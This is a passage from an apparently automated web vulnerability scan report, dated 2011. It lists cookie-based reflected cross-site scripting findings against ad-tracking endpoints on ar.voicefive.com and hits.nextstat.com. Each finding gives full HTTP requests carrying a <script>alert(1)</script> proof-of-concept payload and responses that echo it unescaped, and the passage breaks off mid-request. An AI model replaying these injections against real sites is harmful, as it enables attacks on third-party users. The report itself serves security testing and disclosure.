Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&c3519<script>alert(1)</script>d44fa25d073; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Exp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&c3519<script>alert(1)</script>d44fa25d073', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload 51f3f<script>alert(1)</script>d388c365221 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&51f3f<script>alert(1)</script>d388c365221; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&51f3f<script>alert(1)</script>d388c365221', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:4
...[SNIP]...

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload b2d2d<script>alert(1)</script>a8f3cf0f359 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&b2d2d<script>alert(1)</script>a8f3cf0f359; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:17 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206897; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&b2d2d<script>alert(1)</script>a8f3cf0f359' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 2e933<script>alert(1)</script>2db6105bb74 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&2e933<script>alert(1)</script>2db6105bb74; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&2e933<script>alert(1)</script>2db6105bb74', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 201
...[SNIP]...

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload b3895<script>alert(1)</script>0953d20e172 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&b3895<script>alert(1)</script>0953d20e172; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:27 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206907; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&b3895<script>alert(1)</script>0953d20e172', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 201
...[SNIP]...

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload f9d07<script>alert(1)</script>23cddd478e was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1f9d07<script>alert(1)</script>23cddd478e; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25877

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Exp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1f9d07<script>alert(1)</script>23cddd478e', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.152. http://hits.nextstat.com/scripts/wsb.php [webStat_108645 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /scripts/wsb.php

Issue detail

The value of the webStat_108645 cookie is copied into the HTML document as plain text between tags. The payload de83d<script>alert(1)</script>25380d542c7 was submitted in the webStat_108645 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /scripts/wsb.php?WSc=yes&WSpn=&WSref=&pg=28925&ac=108645&w=1920&h=1200&c=16&js=1.6&WSvp=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&tz=300&ls=&cam=undefined&evt=undefined HTTP/1.1
